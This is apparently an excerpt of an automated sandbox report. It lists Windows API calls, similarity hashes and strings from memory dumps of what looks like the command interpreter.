                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 000225CA
• ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 000225E3
• ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 0002F32B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: memset$InformationVolume_wcsicmp
• String ID: FAT
• API String ID: 4247940253-238207945
APIs
• memset.MSVCRT ref: 00017381
  • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,?,00000000,?), ref: 000173D6
• wcsncmp.MSVCRT ref: 000173F9
• ??_V@YAXPAX@Z.MSVCRT(?,-00000209,?,00000000,?), ref: 00017465
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00001037,00000000,?,?), ref: 0002A8C6
  • Part of subcall function 00020060: wcschr.MSVCRT ref: 0002006C
• wcsstr.MSVCRT ref: 0002A87E
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 0002A89B
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 0002A8DE
  • Part of subcall function 0002589A: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,000259D0,?,00016054,-00001038,00000000,?,?), ref: 000258BB
  • Part of subcall function 0002589A: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 000258CD
  • Part of subcall function 00018B4D: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,000399FD,00000000,?,00000000,0002CF94,00000000,?), ref: 00018B7B
Similarity
• API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
• String ID: \\.\
• API String ID: 799470305-2900601889
APIs
Similarity
• API ID: wcschr$iswspace$_wcsicmp
• String ID: &<|>$+: $=,;
• API String ID: 3089800946-2256444845
APIs
  • Part of subcall function 0003C0F8: free.MSVCRT ref: 0003C116
  • Part of subcall function 0003C0F8: free.MSVCRT ref: 0003C123
  • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
  • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
• longjmp.MSVCRT(00050A30,00000001,00000000,?,00000000), ref: 0003BB97
• qsort.MSVCRT ref: 0003BC1A
• wcschr.MSVCRT ref: 0003BC6F
• calloc.MSVCRT ref: 0003BCB1
                                                                                                                                                                                                                                                                                                                                                                                                                          • calloc.MSVCRT ref: 0003BD82
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0003BDCB
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?), ref: 0003BE1D
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?), ref: 0003BE3E
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 975110957-381716982
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ece39f86db4ec95bf65a5363b6f2852eec9b6880ec334a3cb009f82e53dc72be
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 16cf95b917d082d77fd2937cabb69a5a783cc4b96801ef10493332cf271406a9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ece39f86db4ec95bf65a5363b6f2852eec9b6880ec334a3cb009f82e53dc72be
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3C1BE76A042159BEB758F68D841BEEB7F5FF48714F14406AEA48EB342EB309D80CB54
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _tell.MSVCRT ref: 0001B7F9
                                                                                                                                                                                                                                                                                                                                                                                                                          • _close.MSVCRT ref: 0001B82C
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0001B8CC
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 0001B936
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0004C9F0), ref: 0001B947
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0001B96D
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleInfoOutput_close_tellmemset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: GOTO
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1380661413-1693823284
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 280e98867902c43aa43e650930bb9be14ba9fec4e13724f4881f88d5ea396512
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 47b7e61b8eab5d3d2cd53cb92752803a280d0d53f4f15c5f86e40f6b2a018e1d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 280e98867902c43aa43e650930bb9be14ba9fec4e13724f4881f88d5ea396512
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AB1F270A083118BEB70DF24D944BAFB7E5AF85704F14092DE88587292EB74DD85CB93
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: +-~!
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2191331888-2604099254
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 924090b3b02bf839346dd3d01a0dd6188cc8a3184cf452eae4a0372fd8e0c322
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2d04060298c8d11309c6bc22a11cb651b024431490e682b13e5ff892d6b5a1ae
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 924090b3b02bf839346dd3d01a0dd6188cc8a3184cf452eae4a0372fd8e0c322
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D51AC71500229EBCB14DF64E8899EF37B5EF06361B108526FD069B150EBB9DF50CBA1
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 00037277
                                                                                                                                                                                                                                                                                                                                                                                                                          • iswalpha.MSVCRT ref: 000372AA
                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 000372BD
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 000372EF
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00037304
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00037311
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $%04X-%04X$\
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4001382275-467840296
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00033877), ref: 00032D31
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ObjectSingleWait
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: wil
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 24740636-1589926490
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,0000000A,?), ref: 00038360
                                                                                                                                                                                                                                                                                                                                                                                                                          • _ultoa.MSVCRT ref: 00038376
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 0003838B
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 000383A0
                                                                                                                                                                                                                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 000383D8
                                                                                                                                                                                                                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 0003840C
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: (#$Application$System
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3377411628-593978566
APIs
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,00000000,?,?,?,00025134,-00000001), ref: 00025294
• RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00025134,-00000001), ref: 000252A4
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00025134,-00000001), ref: 00031036
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,00000000,?,?,?,00025134,-00000001), ref: 00031048
• SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00025134,-00000001), ref: 00031064
• RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00025134,-00000001), ref: 00031073
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
• String ID: :$\
• API String ID: 3961617410-1166558509
APIs
• memset.MSVCRT ref: 00021665
• memset.MSVCRT ref: 00021689
• memset.MSVCRT ref: 000216AD
• memset.MSVCRT ref: 000216D1
  • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
• ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 000217CF
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 000217E9
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00021801
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00021813
  • Part of subcall function 0002260E: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00021775,-00000001,-00000001,-00000001,-00000001), ref: 00022650
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: memset$BufferConsoleInfoScreen
• String ID:
• API String ID: 1034426908-0
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,00000001,00039E02,?,?,00039E02), ref: 00034618
                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,00039E02), ref: 00034637
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0004A7F0,00039E02,?,00000000,?,00039E02), ref: 00034646
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,00039E02), ref: 00034653
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(0004A7F0,000134F8,00000003), ref: 00034693
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00039E02,00000000,?,00039E02,?,00039E02), ref: 00034720
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,00039E02,00000000,00000000,?,00039E02), ref: 00034742
                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,00039E02), ref: 0003474F
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0004A7F1,00000001,?,00000000,?,00039E02), ref: 00034764
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,00039E02), ref: 00034771
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2002953238-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ece81f19d48ec123ec72a0e5a4bbf0de04f851b46608858f9f942df29b8a39fd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8432433ad38ca563ecba2c8502a158d50b3d481f5be718eb81833ee7f1bd18c9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ece81f19d48ec123ec72a0e5a4bbf0de04f851b46608858f9f942df29b8a39fd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D51E171A04204AFEB628F68CC4ABAEBBBDEB42311F184129E911DF290D7B45D40CB52
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,0004A7F0,00000000,?,00000200), ref: 0001C818
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0001C882
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001C8BA
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0001C8C4
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001C8DB
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0001C8ED
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 0001C90D
                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 0001C91E
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0004A7F0,00000200,00000000,00000000), ref: 0001C934
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04), ref: 0001C941
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001CAC4
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0001CACE
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(0004A7F0,000134F8,00000003), ref: 0002D16E
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$Pointer_get_osfhandle$LockShared$AcquireByteCharMultiReadReleaseTypeWidememcmpwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1383533039-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 442cdc8a85a230d729aef810dc4d8e3a00ac7b4f23fb2745418a6ba8e47f8de7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7cb70494f5e8d559bd093200e83691f073dcf623b500244b19ff1a501442b13d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 442cdc8a85a230d729aef810dc4d8e3a00ac7b4f23fb2745418a6ba8e47f8de7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5411670A403189BFB708B149C8DBEA77B6AF45305F5401A9F509A71D0CBB98DD1CF56
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2081463915-1668778490
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a69eb7655b91b62f7c5a4af9207f04eedd31ac08eed6f10b3f38e9602fdf0906
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: dd2b1b5c3a00dc0d19dd9378bae4575d109e8c8d0ab7839568e00acd7b776721
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a69eb7655b91b62f7c5a4af9207f04eedd31ac08eed6f10b3f38e9602fdf0906
